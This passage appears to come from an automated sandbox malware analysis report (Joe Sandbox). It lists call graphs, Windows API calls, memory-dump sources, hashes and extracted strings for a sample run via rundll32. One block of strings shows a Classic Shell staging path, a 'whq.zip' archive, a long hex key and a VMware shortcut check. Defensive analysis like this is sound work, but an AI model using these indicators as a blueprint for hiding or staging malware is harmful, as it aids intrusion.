GetProcAddress 8261->8262 8263 423029 8262->8263 8264 4208c0 TlsGetValue GetProcAddress 8263->8264 8265 423043 8264->8265 8266 4208c0 TlsGetValue GetProcAddress 8265->8266 8267 42305d 8266->8267 8268 4208c0 TlsGetValue GetProcAddress 8267->8268 8269 423077 8268->8269 8270 4208c0 TlsGetValue GetProcAddress 8269->8270 8271 423091 8270->8271 8272 4208c0 TlsGetValue GetProcAddress 8271->8272 8273 4230ab 8272->8273 8274 4208c0 TlsGetValue GetProcAddress 8273->8274 8275 4230c5 8274->8275 8276 4208c0 TlsGetValue GetProcAddress 8275->8276 8277 4230df 8276->8277 8278 4208c0 TlsGetValue GetProcAddress 8277->8278 8279 4230f9 8278->8279 8280 4208c0 TlsGetValue GetProcAddress 8279->8280 8281 423113 8280->8281 8282 4208c0 TlsGetValue GetProcAddress 8281->8282 8283 42312d 8282->8283 8284 4208c0 TlsGetValue GetProcAddress 8283->8284 8285 423147 8284->8285 8286 4208c0 TlsGetValue GetProcAddress 8285->8286 8287 423161 8286->8287 8288 4208c0 TlsGetValue GetProcAddress 8287->8288 8289 42317b 8288->8289 8290 4208c0 TlsGetValue GetProcAddress 8289->8290 8290->8244 8292 4208ea GetProcAddress 8291->8292 8293 4208fd 8291->8293 8294 420931 8292->8294 8295 4109e0 TlsGetValue 8293->8295 8296 40fe30 TlsGetValue 8294->8296 8298 42090e 8295->8298 8297 42093b 8296->8297 8297->8237 8299 40fe30 TlsGetValue 8298->8299 8299->8294 8301 4104b0 TlsGetValue 8300->8301 8302 436e26 8301->8302 8303 436e9e 8302->8303 8304 436e38 GetFileAttributesW 8302->8304 8305 436ea7 SetFileAttributesW 8303->8305 8304->8303 8306 436e48 8304->8306 8307 436eb6 GetLastError 8305->8307 8308 436ebe 8305->8308 8309 434060 73 API calls 8306->8309 8307->8308 8310 40fec0 TlsGetValue 8308->8310 8312 436e55 8309->8312 8311 436ece 8310->8311 8311->7596 8312->8303 8313 436e91 8312->8313 8314 437200 TlsGetValue 8312->8314 8315 4104b0 TlsGetValue 8313->8315 8316 436e73 8314->8316 8315->8303 8317 442b00 TlsGetValue 8316->8317 8318 436e80 8317->8318 8319 411580 TlsGetValue 8318->8319 8319->8313 8321 7f4953 8320->8321 8322 7f496c 8321->8322 8323 440a70 33 API calls 8321->8323 8322->6984 8323->8322 8325 7f48f4 8324->8325 8326 440a70 33 API calls 8325->8326 8327 7f490d 8325->8327 8326->8327 8327->6987 8329 7f484d 8328->8329 8330 7f4883 8329->8330 8331 440a70 33 API calls 8329->8331 8332 413560 14 API calls 8330->8332 8331->8330 8333 7f48a0 8332->8333 8333->6970 8335 40ff78 Sleep 8334->8335 8335->7015 8336 417be0 8337 417c0d 8336->8337 8344 417c47 8336->8344 8338 417c17 8337->8338 8339 417c49 8337->8339 8340 413d70 33 API calls 8338->8340 8341 4111e0 TlsGetValue 8339->8341 8342 417c22 8340->8342 8341->8344 8343 4100a0 TlsGetValue 8342->8343 8343->8344

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                    • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                    • GetLocaleInfoW.KERNEL32 ref: 00415277
                      • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                      • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                    • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                    • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetMessageW.USER32 ref: 00816038
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • Sleep.KERNEL32 ref: 00815FC0
                    Strings
                    • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                    • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                    • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                    • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                    • \VMware Workstation.lnk, xrefs: 00815F58
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFileMessageSleep
                    • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                    • API String ID: 2390311571-3073936675
                    • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                    • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LeaveCriticalSection.KERNEL32 ref: 00414771
                    • EnterCriticalSection.KERNEL32 ref: 00414847
                    • LeaveCriticalSection.KERNEL32 ref: 00414880
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
